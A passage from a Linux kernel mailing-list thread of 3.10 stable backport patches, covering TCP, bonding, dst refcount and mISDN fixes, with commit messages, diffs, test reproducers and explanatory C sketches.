features like CONFIG_DEBUG_PAGEALLOC, this can crash the kernel.
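
The dangling pointer can be pictured with a small user-space model. This is
a sketch under stated assumptions, not the kernel code: demo_skb, demo_sock
and demo_check_send_head() are hypothetical names that mirror only the two
pointers mentioned above.

```c
#include <stddef.h>

/* Hypothetical stand-ins for an skb and the two per-socket pointers. */
struct demo_skb {
	int id;
};

struct demo_sock {
	struct demo_skb *send_head;
	struct demo_skb *highest_sack;
};

/*
 * Called when 'unlinked' is removed from the write queue: every cached
 * pointer that still refers to it must be cleared before it is freed.
 */
static void demo_check_send_head(struct demo_sock *sk,
				 const struct demo_skb *unlinked)
{
	if (sk->send_head == unlinked)
		sk->send_head = NULL;
	/* The step the undo path used to miss. */
	if (sk->highest_sack == unlinked)
		sk->highest_sack = NULL;
}
```

Clearing both pointers in the same helper means any path that unlinks an
skb cannot leave one of them pointing at freed memory.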

This bug was found by Marco Grassi thanks to syzkaller.

Fixes: 6859d49475d4 ("[TCP]: Abstract tp->highest_sack accessing & point to next skb")
Reported-by: Marco Grassi <marco.gra@gmail.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Ilpo Järvinen <ilpo.jarvinen@helsinki.fi>
Cc: Yuchung Cheng <ycheng@google.com>
Cc: Neal Cardwell <ncardwell@google.com>
Acked-by: Neal Cardwell <ncardwell@google.com>
Reviewed-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/net/tcp.h | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/include/net/tcp.h b/include/net/tcp.h
index 29a1a63..1c5e037 100644
--- a/include/net/tcp.h
+++ b/include/net/tcp.h
@@ -1392,6 +1392,8 @@ static inline void tcp_check_send_head(struct sock *sk, struct sk_buff *skb_unli
 {
 	if (sk->sk_send_head == skb_unlinked)
 		sk->sk_send_head = NULL;
+	if (tcp_sk(sk)->highest_sack == skb_unlinked)
+		tcp_sk(sk)->highest_sack = NULL;
 }
 
 static inline void tcp_init_send_head(struct sock *sk)
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 232/319] tcp: properly scale window in tcp_v[46]_reqsk_send_ack()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (130 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 231/319] tcp: fix use after free in tcp_xmit_retransmit_queue() Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 233/319] tcp: fix overflow in __tcp_retransmit_skb() Willy Tarreau
                   ` (86 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Eric Dumazet, Yuchung Cheng, Neal Cardwell, David S . Miller,
	Willy Tarreau

From: Eric Dumazet <edumazet@google.com>

commit 20a2b49fc538540819a0c552877086548cff8d8d upstream.

When sending an ack in SYN_RECV state, we must scale the offered
window if wscale option was negotiated and accepted.

Tested:
 The following packetdrill test demonstrates the issue:

0.000 socket(..., SOCK_STREAM, IPPROTO_TCP) = 3
+0 setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

+0 bind(3, ..., ...) = 0
+0 listen(3, 1) = 0

// Establish a connection.
+0 < S 0:0(0) win 20000 <mss 1000,sackOK,wscale 7, nop, TS val 100 ecr 0>
+0 > S. 0:0(0) ack 1 win 28960 <mss 1460,sackOK, TS val 100 ecr 100, nop, wscale 7>

+0 < . 1:11(10) ack 1 win 156 <nop,nop,TS val 99 ecr 100>
// check that window is properly scaled !
+0 > . 1:1(0) ack 1 win 226 <nop,nop,TS val 200 ecr 100>
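
The numbers in the test above can be checked with a few lines of C. This is
a minimal sketch with hypothetical helper names: it only models the shift
applied to the advertised window and what the peer reconstructs from the
16-bit field.

```c
#include <stdint.h>

/* Value placed in the TCP window field of a non-SYN segment. */
static uint16_t demo_window_field(uint32_t rcv_wnd, uint8_t rcv_wscale)
{
	return (uint16_t)(rcv_wnd >> rcv_wscale);
}

/* Window the peer derives from the field once scaling is in effect. */
static uint32_t demo_peer_view(uint16_t field, uint8_t rcv_wscale)
{
	return (uint32_t)field << rcv_wscale;
}
```

With rcv_wnd = 28960 and wscale 7 the field becomes 226, matching the last
line of the test. Sending the unscaled 28960 instead would make the peer
believe the window is 28960 << 7 = 3706880 bytes.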

Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Yuchung Cheng <ycheng@google.com>
Cc: Neal Cardwell <ncardwell@google.com>
Acked-by: Yuchung Cheng <ycheng@google.com>
Acked-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/ipv4/tcp_ipv4.c | 3 ++-
 net/ipv6/tcp_ipv6.c | 8 +++++++-
 2 files changed, 9 insertions(+), 2 deletions(-)

diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c
index 11f27a4..5401fbf 100644
--- a/net/ipv4/tcp_ipv4.c
+++ b/net/ipv4/tcp_ipv4.c
@@ -824,7 +824,8 @@ static void tcp_v4_reqsk_send_ack(struct sock *sk, struct sk_buff *skb,
 	 */
 	tcp_v4_send_ack(skb, (sk->sk_state == TCP_LISTEN) ?
 			tcp_rsk(req)->snt_isn + 1 : tcp_sk(sk)->snd_nxt,
-			tcp_rsk(req)->rcv_nxt, req->rcv_wnd,
+			tcp_rsk(req)->rcv_nxt,
+			req->rcv_wnd >> inet_rsk(req)->rcv_wscale,
 			tcp_time_stamp,
 			req->ts_recent,
 			0,
diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
index 41c026f..d823738 100644
--- a/net/ipv6/tcp_ipv6.c
+++ b/net/ipv6/tcp_ipv6.c
@@ -902,8 +902,14 @@ static void tcp_v6_timewait_ack(struct sock *sk, struct sk_buff *skb)
 static void tcp_v6_reqsk_send_ack(struct sock *sk, struct sk_buff *skb,
 				  struct request_sock *req)
 {
+	/* RFC 7323 2.3
+	 * The window field (SEG.WND) of every outgoing segment, with the
+	 * exception of <SYN> segments, MUST be right-shifted by
+	 * Rcv.Wind.Shift bits:
+	 */
 	tcp_v6_send_ack(skb, tcp_rsk(req)->snt_isn + 1, tcp_rsk(req)->rcv_isn + 1,
-			req->rcv_wnd, tcp_time_stamp, req->ts_recent,
+			req->rcv_wnd >> inet_rsk(req)->rcv_wscale,
+			tcp_time_stamp, req->ts_recent,
 			tcp_v6_md5_do_lookup(sk, &ipv6_hdr(skb)->daddr), 0);
 }
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 233/319] tcp: fix overflow in __tcp_retransmit_skb()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (131 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 232/319] tcp: properly scale window in tcp_v[46]_reqsk_send_ack() Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 234/319] tcp: fix wrong checksum calculation on MTU probing Willy Tarreau
                   ` (85 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Eric Dumazet, David S . Miller, Willy Tarreau

From: Eric Dumazet <edumazet@google.com>

commit ffb4d6c8508657824bcef68a36b2a0f9d8c09d10 upstream.

If a TCP socket gets a large write queue, an overflow can happen
in a test in __tcp_retransmit_skb() preventing all retransmits.

The flow then stalls and resets after timeouts.

Tested:

sysctl -w net.core.wmem_max=1000000000
netperf -H dest -- -s 1000000000
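
A rough user-space sketch of the arithmetic, assuming 32-bit int and
hypothetical helper names: with a queue near 2000000000 bytes, adding a
quarter of the queue no longer fits in a signed int. Signed overflow is
undefined in ISO C, so the sketch does the addition in unsigned arithmetic
and converts back, which wraps to a negative value on common compilers.

```c
#include <stdint.h>

/* Models min() on int operands: the wrapped sum compares as negative. */
static int demo_limit_signed(int queued, int sndbuf)
{
	int sum = (int)((uint32_t)queued + ((uint32_t)queued >> 2));

	return sum < sndbuf ? sum : sndbuf;
}

/* Models min_t(u32, ...): both operands are compared as unsigned. */
static uint32_t demo_limit_u32(int queued, int sndbuf)
{
	uint32_t sum = (uint32_t)queued + ((uint32_t)queued >> 2);
	uint32_t buf = (uint32_t)sndbuf;

	return sum < buf ? sum : buf;
}
```

In the signed variant the limit turns negative, so any positive amount of
allocated write memory exceeds it and every retransmit is refused. The
unsigned variant yields the send buffer size as the limit.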

Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/ipv4/tcp_output.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c
index 276b283..465285b 100644
--- a/net/ipv4/tcp_output.c
+++ b/net/ipv4/tcp_output.c
@@ -2327,7 +2327,8 @@ int __tcp_retransmit_skb(struct sock *sk, struct sk_buff *skb)
 	 * copying overhead: fragmentation, tunneling, mangling etc.
 	 */
 	if (atomic_read(&sk->sk_wmem_alloc) >
-	    min(sk->sk_wmem_queued + (sk->sk_wmem_queued >> 2), sk->sk_sndbuf))
+	    min_t(u32, sk->sk_wmem_queued + (sk->sk_wmem_queued >> 2),
+		  sk->sk_sndbuf))
 		return -EAGAIN;
 
 	if (before(TCP_SKB_CB(skb)->seq, tp->snd_una)) {
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 234/319] tcp: fix wrong checksum calculation on MTU probing
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (132 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 233/319] tcp: fix overflow in __tcp_retransmit_skb() Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 235/319] tcp: take care of truncations done by sk_filter() Willy Tarreau
                   ` (84 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Douglas Caetano dos Santos, David S . Miller, Willy Tarreau

From: Douglas Caetano dos Santos <douglascs@taghos.com.br>

commit 2fe664f1fcf7c4da6891f95708a7a56d3c024354 upstream.

With TCP MTU probing enabled and offload TX checksumming disabled,
tcp_mtu_probe() calculated the wrong checksum when a fragment being copied
into the probe's SKB had an odd length. This was caused by the direct use
of skb_copy_and_csum_bits() to calculate the checksum, as it pads the
fragment being copied, if needed. When this fragment was not the last, a
subsequent call used the previous checksum without considering this
padding.

The effect was a connection stalled in one direction, as even retransmissions
wouldn't solve the problem, because the checksum was never recalculated for
the full SKB length.
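
The odd-length problem can be reproduced outside the kernel. The sketch
below uses hypothetical helpers (demo_fold, demo_sum16, demo_block_add) on
16-bit folded one's-complement sums; it is not the kernel's
csum_block_add(), only a model of the same idea: a block that starts at an
odd offset has its bytes in the opposite lanes, so its sum must be
byte-swapped before being added.

```c
#include <stddef.h>
#include <stdint.h>

/* Fold carries back into 16 bits (end-around carry). */
static uint16_t demo_fold(uint32_t sum)
{
	while (sum >> 16)
		sum = (sum & 0xffff) + (sum >> 16);
	return (uint16_t)sum;
}

/* Sum of 16-bit big-endian words; a trailing odd byte is zero-padded. */
static uint16_t demo_sum16(const uint8_t *p, size_t len)
{
	uint32_t sum = 0;
	size_t i;

	for (i = 0; i + 1 < len; i += 2)
		sum = demo_fold(sum + (((uint32_t)p[i] << 8) | p[i + 1]));
	if (i < len)
		sum = demo_fold(sum + ((uint32_t)p[i] << 8));
	return (uint16_t)sum;
}

/* Add the sum of a block located 'offset' bytes into the buffer. */
static uint16_t demo_block_add(uint16_t csum, uint16_t block, size_t offset)
{
	if (offset & 1)
		block = (uint16_t)((block << 8) | (block >> 8));
	return demo_fold((uint32_t)csum + block);
}
```

For the bytes 01 02 03 04 05 06 07 split as 3 + 4, chaining the two sums
directly gives 0x0e0e, while the offset-aware addition gives 0x100c, the
same value as summing all seven bytes at once.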

Signed-off-by: Douglas Caetano dos Santos <douglascs@taghos.com.br>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/ipv4/tcp_output.c | 12 +++++++-----
 1 file changed, 7 insertions(+), 5 deletions(-)

diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c
index 465285b..1f2f6b5 100644
--- a/net/ipv4/tcp_output.c
+++ b/net/ipv4/tcp_output.c
@@ -1753,12 +1753,14 @@ static int tcp_mtu_probe(struct sock *sk)
 	len = 0;
 	tcp_for_write_queue_from_safe(skb, next, sk) {
 		copy = min_t(int, skb->len, probe_size - len);
-		if (nskb->ip_summed)
+		if (nskb->ip_summed) {
 			skb_copy_bits(skb, 0, skb_put(nskb, copy), copy);
-		else
-			nskb->csum = skb_copy_and_csum_bits(skb, 0,
-							    skb_put(nskb, copy),
-							    copy, nskb->csum);
+		} else {
+			__wsum csum = skb_copy_and_csum_bits(skb, 0,
+							     skb_put(nskb, copy),
+							     copy, 0);
+			nskb->csum = csum_block_add(nskb->csum, csum, len);
+		}
 
 		if (skb->len <= copy) {
 			/* We've eaten all the data from this skb.
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 235/319] tcp: take care of truncations done by sk_filter()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (133 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 234/319] tcp: fix wrong checksum calculation on MTU probing Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 236/319] bonding: Fix bonding crash Willy Tarreau
                   ` (83 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Eric Dumazet, David S . Miller, Willy Tarreau

From: Eric Dumazet <edumazet@google.com>

commit ac6e780070e30e4c35bd395acfe9191e6268bdd3 upstream.

With syzkaller help, Marco Grassi found a bug in TCP stack,
crashing in tcp_collapse()

Root cause is that sk_filter() can truncate the incoming skb,
but TCP stack was not really expecting this to happen.
It probably was expecting a simple DROP or ACCEPT behavior.

We first need to make sure no part of TCP header could be removed.
Then we need to adjust TCP_SKB_CB(skb)->end_seq
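
Those two steps can be modelled in a few lines. This is a sketch with
hypothetical types and names (demo_seg, demo_filter_trim_cap,
demo_tcp_filter), assuming the segment length counts the TCP header plus
payload and that a filter result of 0 means "drop".

```c
#include <stdint.h>

/* Hypothetical model of a received segment. */
struct demo_seg {
	unsigned int len;      /* TCP header + payload bytes */
	unsigned int hdr_len;  /* TCP header length in bytes */
	uint32_t end_seq;      /* sequence number after the last byte */
};

/* Trim to the filter's verdict, but never below 'cap' bytes. */
static int demo_filter_trim_cap(struct demo_seg *s, unsigned int pkt_len,
				unsigned int cap)
{
	unsigned int keep;

	if (pkt_len == 0)
		return -1;             /* filter asked for a drop */
	keep = pkt_len > cap ? pkt_len : cap;
	if (keep < s->len)
		s->len = keep;         /* trimming only ever shortens */
	return 0;
}

/* Keep the whole TCP header, then account for the bytes removed. */
static int demo_tcp_filter(struct demo_seg *s, unsigned int pkt_len)
{
	unsigned int before = s->len;
	int err = demo_filter_trim_cap(s, pkt_len, s->hdr_len);

	if (!err)
		s->end_seq -= before - s->len;
	return err;
}
```

A filter that returns 8 for a 120-byte segment with a 20-byte header leaves
the header intact (length 20) and moves end_seq back by the 100 payload
bytes that were cut.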

Many thanks to syzkaller team and Marco for giving us a reproducer.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Marco Grassi <marco.gra@gmail.com>
Reported-by: Vladis Dronov <vdronov@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/linux/filter.h |  6 +++++-
 include/net/tcp.h      |  1 +
 net/core/filter.c      | 10 +++++-----
 net/ipv4/tcp_ipv4.c    | 19 ++++++++++++++++++-
 net/ipv6/tcp_ipv6.c    |  6 ++++--
 5 files changed, 33 insertions(+), 9 deletions(-)

diff --git a/include/linux/filter.h b/include/linux/filter.h
index f65f5a6..c2bea01 100644
--- a/include/linux/filter.h
+++ b/include/linux/filter.h
@@ -36,7 +36,11 @@ static inline unsigned int sk_filter_len(const struct sk_filter *fp)
 	return fp->len * sizeof(struct sock_filter) + sizeof(*fp);
 }
 
-extern int sk_filter(struct sock *sk, struct sk_buff *skb);
+int sk_filter_trim_cap(struct sock *sk, struct sk_buff *skb, unsigned int cap);
+static inline int sk_filter(struct sock *sk, struct sk_buff *skb)
+{
+	return sk_filter_trim_cap(sk, skb, 1);
+}
 extern unsigned int sk_run_filter(const struct sk_buff *skb,
 				  const struct sock_filter *filter);
 extern int sk_unattached_filter_create(struct sk_filter **pfp,
diff --git a/include/net/tcp.h b/include/net/tcp.h
index 1c5e037..79cd118 100644
--- a/include/net/tcp.h
+++ b/include/net/tcp.h
@@ -1029,6 +1029,7 @@ static inline void tcp_prequeue_init(struct tcp_sock *tp)
 }
 
 extern bool tcp_prequeue(struct sock *sk, struct sk_buff *skb);
+int tcp_filter(struct sock *sk, struct sk_buff *skb);
 
 #undef STATE_TRACE
 
diff --git a/net/core/filter.c b/net/core/filter.c
index c6c18d8..65f2a65 100644
--- a/net/core/filter.c
+++ b/net/core/filter.c
@@ -67,9 +67,10 @@ static inline void *load_pointer(const struct sk_buff *skb, int k,
 }
 
 /**
- *	sk_filter - run a packet through a socket filter
+ *	sk_filter_trim_cap - run a packet through a socket filter
  *	@sk: sock associated with &sk_buff
  *	@skb: buffer to filter
+ *	@cap: limit on how short the eBPF program may trim the packet
  *
  * Run the filter code and then cut skb->data to correct size returned by
  * sk_run_filter. If pkt_len is 0 we toss packet. If skb->len is smaller
@@ -78,7 +79,7 @@ static inline void *load_pointer(const struct sk_buff *skb, int k,
  * be accepted or -EPERM if the packet should be tossed.
  *
  */
-int sk_filter(struct sock *sk, struct sk_buff *skb)
+int sk_filter_trim_cap(struct sock *sk, struct sk_buff *skb, unsigned int cap)
 {
 	int err;
 	struct sk_filter *filter;
@@ -99,14 +100,13 @@ int sk_filter(struct sock *sk, struct sk_buff *skb)
 	filter = rcu_dereference(sk->sk_filter);
 	if (filter) {
 		unsigned int pkt_len = SK_RUN_FILTER(filter, skb);
-
-		err = pkt_len ? pskb_trim(skb, pkt_len) : -EPERM;
+		err = pkt_len ? pskb_trim(skb, max(cap, pkt_len)) : -EPERM;
 	}
 	rcu_read_unlock();
 
 	return err;
 }
-EXPORT_SYMBOL(sk_filter);
+EXPORT_SYMBOL(sk_filter_trim_cap);
 
 /**
  *	sk_run_filter - run a filter on a socket
diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c
index 5401fbf..6504a08 100644
--- a/net/ipv4/tcp_ipv4.c
+++ b/net/ipv4/tcp_ipv4.c
@@ -1959,6 +1959,21 @@ bool tcp_prequeue(struct sock *sk, struct sk_buff *skb)
 }
 EXPORT_SYMBOL(tcp_prequeue);
 
+int tcp_filter(struct sock *sk, struct sk_buff *skb)
+{
+	struct tcphdr *th = (struct tcphdr *)skb->data;
+	unsigned int eaten = skb->len;
+	int err;
+
+	err = sk_filter_trim_cap(sk, skb, th->doff * 4);
+	if (!err) {
+		eaten -= skb->len;
+		TCP_SKB_CB(skb)->end_seq -= eaten;
+	}
+	return err;
+}
+EXPORT_SYMBOL(tcp_filter);
+
 /*
  *	From tcp_input.c
  */
@@ -2021,8 +2036,10 @@ process:
 		goto discard_and_relse;
 	nf_reset(skb);
 
-	if (sk_filter(sk, skb))
+	if (tcp_filter(sk, skb))
 		goto discard_and_relse;
+	th = (const struct tcphdr *)skb->data;
+	iph = ip_hdr(skb);
 
 	skb->dev = NULL;
 
diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
index d823738..70b10ed 100644
--- a/net/ipv6/tcp_ipv6.c
+++ b/net/ipv6/tcp_ipv6.c
@@ -1330,7 +1330,7 @@ static int tcp_v6_do_rcv(struct sock *sk, struct sk_buff *skb)
 		goto discard;
 #endif
 
-	if (sk_filter(sk, skb))
+	if (tcp_filter(sk, skb))
 		goto discard;
 
 	/*
@@ -1501,8 +1501,10 @@ process:
 	if (!xfrm6_policy_check(sk, XFRM_POLICY_IN, skb))
 		goto discard_and_relse;
 
-	if (sk_filter(sk, skb))
+	if (tcp_filter(sk, skb))
 		goto discard_and_relse;
+	th = (const struct tcphdr *)skb->data;
+	hdr = ipv6_hdr(skb);
 
 	skb->dev = NULL;
 
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 236/319] bonding: Fix bonding crash
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Mahesh Bandewar, David S . Miller, Willy Tarreau

From: Mahesh Bandewar <maheshb@google.com>

commit 24b27fc4cdf9e10c5e79e5923b6b7c2c5c95096c upstream.

The following steps crash the kernel:

  (a) Create bonding master
      > modprobe bonding miimon=50
  (b) Create macvlan bridge on eth2
      > ip link add link eth2 dev mvl0 address aa:0:0:0:0:01 \
	   type macvlan
  (c) Now try adding eth2 into the bond
      > echo +eth2 > /sys/class/net/bond0/bonding/slaves
      <crash>

Bonding does a lot of work before checking whether the device being
enslaved is busy.

In this case, when the notifier call-chain sends notifications,
bond_netdev_event() assumes that rx_handler/rx_handler_data is
registered, while bond_enslave() hasn't progressed far enough to
register the rx_handler for the new slave.

This patch adds an rx_handler check that can be performed right at the
beginning of the enslave code to avoid getting into this situation.

Signed-off-by: Mahesh Bandewar <maheshb@google.com>
Acked-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/net/bonding/bond_main.c |  7 ++++---
 include/linux/netdevice.h       |  1 +
 net/core/dev.c                  | 16 ++++++++++++++++
 3 files changed, 21 insertions(+), 3 deletions(-)
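
For illustration only (not part of the patch): a minimal userspace sketch
of the "check for a busy device before doing any work" ordering described
above. struct model_dev, model_rx_handler_busy() and model_enslave() are
hypothetical stand-ins, not kernel APIs, and locking (rtnl) is left out.

```c
#include <errno.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical, simplified stand-in for struct net_device. */
struct model_dev {
	void *rx_handler;	/* non-NULL once macvlan, bonding, ... owns RX */
	int   setup_steps;	/* counts work done by model_enslave() */
};

/* Same idea as netdev_is_rx_handler_busy(): is a handler registered? */
bool model_rx_handler_busy(const struct model_dev *dev)
{
	return dev && dev->rx_handler;
}

/* Reject a busy device first, before any state is touched. */
int model_enslave(struct model_dev *slave, void *bond_handler)
{
	if (model_rx_handler_busy(slave))
		return -EBUSY;

	slave->setup_steps++;		/* stands in for the real setup work */
	slave->rx_handler = bond_handler;
	return 0;
}
```

In this model a device that already has a handler (the macvlan case from
the reproducer) is refused with -EBUSY and no setup step runs for it.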

diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
index c0ed7c8..ce41616 100644
--- a/drivers/net/bonding/bond_main.c
+++ b/drivers/net/bonding/bond_main.c
@@ -1565,9 +1565,10 @@ int bond_enslave(struct net_device *bond_dev, struct net_device *slave_dev)
 			   bond_dev->name, slave_dev->name);
 	}
 
-	/* already enslaved */
-	if (slave_dev->flags & IFF_SLAVE) {
-		pr_debug("Error, Device was already enslaved\n");
+	/* already in-use? */
+	if (netdev_is_rx_handler_busy(slave_dev)) {
+		netdev_err(bond_dev,
+			   "Error: Device is in use and cannot be enslaved\n");
 		return -EBUSY;
 	}
 
diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
index 4d2e041..45a618b 100644
--- a/include/linux/netdevice.h
+++ b/include/linux/netdevice.h
@@ -2223,6 +2223,7 @@ static inline void napi_free_frags(struct napi_struct *napi)
 	napi->skb = NULL;
 }
 
+bool netdev_is_rx_handler_busy(struct net_device *dev);
 extern int netdev_rx_handler_register(struct net_device *dev,
 				      rx_handler_func_t *rx_handler,
 				      void *rx_handler_data);
diff --git a/net/core/dev.c b/net/core/dev.c
index 1ccfc49..408f6ee 100644
--- a/net/core/dev.c
+++ b/net/core/dev.c
@@ -3346,6 +3346,22 @@ out:
 #endif
 
 /**
+ *	netdev_is_rx_handler_busy - check if receive handler is registered
+ *	@dev: device to check
+ *
+ *	Check if a receive handler is already registered for a given device.
+ *	Return true if there one.
+ *
+ *	The caller must hold the rtnl_mutex.
+ */
+bool netdev_is_rx_handler_busy(struct net_device *dev)
+{
+	ASSERT_RTNL();
+	return dev && rtnl_dereference(dev->rx_handler);
+}
+EXPORT_SYMBOL_GPL(netdev_is_rx_handler_busy);
+
+/**
  *	netdev_rx_handler_register - register receive handler
  *	@dev: device to register a handler for
  *	@rx_handler: receive handler to register
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 237/319] net: ratelimit warnings about dst entry refcount underflow or overflow
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Konstantin Khlebnikov, David S . Miller, Willy Tarreau

From: Konstantin Khlebnikov <khlebnikov@yandex-team.ru>

commit 8bf4ada2e21378816b28205427ee6b0e1ca4c5f1 upstream.

The kernel generates a lot of warnings when a dst entry reference counter
overflows and becomes negative. That bug was seen several times on
machines with outdated 3.10.y kernels. Most likely it's already fixed
upstream. In any case, the flood completely kills the machine and makes
further debugging impossible.

Signed-off-by: Konstantin Khlebnikov <khlebnikov@yandex-team.ru>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/core/dst.c | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)
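
For illustration only (not part of the patch): a rough userspace model of
interval/burst rate limiting, the general technique behind a ratelimited
warning. The struct, the function name and the tick values are assumptions
made for this sketch; it is not the kernel's implementation.

```c
#include <stdbool.h>

/* Hypothetical model of an interval/burst rate limiter. */
struct model_ratelimit {
	long interval;	/* window length, in arbitrary ticks */
	int  burst;	/* messages allowed per window */
	long begin;	/* start of the current window */
	int  printed;	/* messages emitted in the current window */
	int  missed;	/* messages suppressed in the current window */
};

/* Returns true if the caller may emit a message at time 'now'. */
bool model_ratelimit_ok(struct model_ratelimit *rs, long now)
{
	if (now - rs->begin >= rs->interval) {
		/* New window: reset the counters. */
		rs->begin = now;
		rs->printed = 0;
		rs->missed = 0;
	}
	if (rs->printed < rs->burst) {
		rs->printed++;
		return true;
	}
	rs->missed++;
	return false;
}
```

With a burst of 2, a storm of 100 events inside one window yields two
messages and 98 suppressed ones, so the log stays usable for debugging.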

diff --git a/net/core/dst.c b/net/core/dst.c
index 1bf6842..582b861 100644
--- a/net/core/dst.c
+++ b/net/core/dst.c
@@ -283,7 +283,9 @@ void dst_release(struct dst_entry *dst)
 		unsigned short nocache = dst->flags & DST_NOCACHE;
 
 		newrefcnt = atomic_dec_return(&dst->__refcnt);
-		WARN_ON(newrefcnt < 0);
+		if (unlikely(newrefcnt < 0))
+			net_warn_ratelimited("%s: dst:%p refcnt:%d\n",
+					     __func__, dst, newrefcnt);
 		if (!newrefcnt && unlikely(nocache))
 			call_rcu(&dst->rcu_head, dst_destroy_rcu);
 	}
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 238/319] mISDN: Support DR6 indication in mISDNipac driver
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Maciej S. Szmigiero, David S . Miller, Willy Tarreau

From: "Maciej S. Szmigiero" <mail@maciej.szmigiero.name>

commit 1e1589ad8b5cb5b8a6781ba5850cf710ada0e919 upstream.

According to figure 39 in the PEB3086 data sheet, version 1.4, this
indication replaces DR when the layer 1 transition source state is F6.

This fixes mISDN layer 1 getting stuck in F6 state in TE mode on
Dialogic Diva 2.02 card (and possibly others) when NT deactivates it.

Signed-off-by: Maciej S. Szmigiero <mail@maciej.szmigiero.name>
Acked-by: Karsten Keil <keil@b1-systems.de>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/isdn/hardware/mISDN/ipac.h      | 1 +
 drivers/isdn/hardware/mISDN/mISDNipac.c | 2 ++
 2 files changed, 3 insertions(+)

diff --git a/drivers/isdn/hardware/mISDN/ipac.h b/drivers/isdn/hardware/mISDN/ipac.h
index 8121e04..31fb3b0 100644
--- a/drivers/isdn/hardware/mISDN/ipac.h
+++ b/drivers/isdn/hardware/mISDN/ipac.h
@@ -217,6 +217,7 @@ struct ipac_hw {
 #define ISAC_IND_DR		0x0
 #define ISAC_IND_SD		0x2
 #define ISAC_IND_DIS		0x3
+#define ISAC_IND_DR6		0x5
 #define ISAC_IND_EI		0x6
 #define ISAC_IND_RSY		0x4
 #define ISAC_IND_ARD		0x8
diff --git a/drivers/isdn/hardware/mISDN/mISDNipac.c b/drivers/isdn/hardware/mISDN/mISDNipac.c
index ccd7d85..bac920c 100644
--- a/drivers/isdn/hardware/mISDN/mISDNipac.c
